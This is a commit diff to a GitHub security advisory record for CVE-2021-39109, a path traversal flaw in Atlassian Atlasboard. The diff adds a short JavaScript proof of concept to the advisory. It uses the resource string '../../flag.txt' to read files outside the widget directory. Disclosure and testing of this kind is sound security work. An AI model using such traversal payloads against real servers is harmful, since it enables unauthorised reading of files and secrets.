Merge pull request #6094 from github/AryazE-GHSA-25pr-6pr6-68v7

Author: advisory-database[bot]

advisories/github-reviewed/2021/09/GHSA-25pr-6pr6-68v7/GHSA-25pr-6pr6-68v7.json

@@ -1,13 +1,13 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-25pr-6pr6-68v7",
-  "modified": "2024-10-14T19:41:27Z",
+  "modified": "2024-10-14T19:41:28Z",
   "published": "2021-09-02T17:17:25Z",
   "aliases": [
     "CVE-2021-39109"
   ],
   "summary": "Path traversal in atlasboard",
-  "details": "The renderWidgetResource resource in Atlasian Atlasboard before version 1.1.9 allows remote attackers to read arbitrary files via a path traversal vulnerability.",
+  "details": "The renderWidgetResource resource in Atlasian Atlasboard before version 1.1.9 allows remote attackers to read arbitrary files via a path traversal vulnerability.\n\n### PoC\n```javascript\nconst widget = require(\"atlasboard/lib/webapp/routes/widget\");\n\n// Mock req and res\nconst req = {};\nconst res = {\n  sendFile: (filePath) => {\n    // Read and return file contents synchronously\n    const data = fs.readFileSync(filePath, \"utf8\");\n    console.log(\"Contents of /flag.txt:\");\n    console.log(data);\n  },\n  status: function (code) {\n    this.statusCode = code;\n    return this;\n  },\n  send: function (msg) {\n    throw new Error(`Server responded with status ${this.statusCode}: ${msg}`);\n  },\n};\n\n// localPackagesPath set to root to allow traversal to /flag.txt\nconst localPackagesPath = \"/\";\n\n// resource string with path traversal to escape localPackagesPath and widgets directory\nconst resource = \"../../flag.txt\";\n\n// Call vulnerable function\nawait widget.renderWidgetResource(localPackagesPath, resource, req, res);\n```",
   "severity": [
     {
       "type": "CVSS_V3",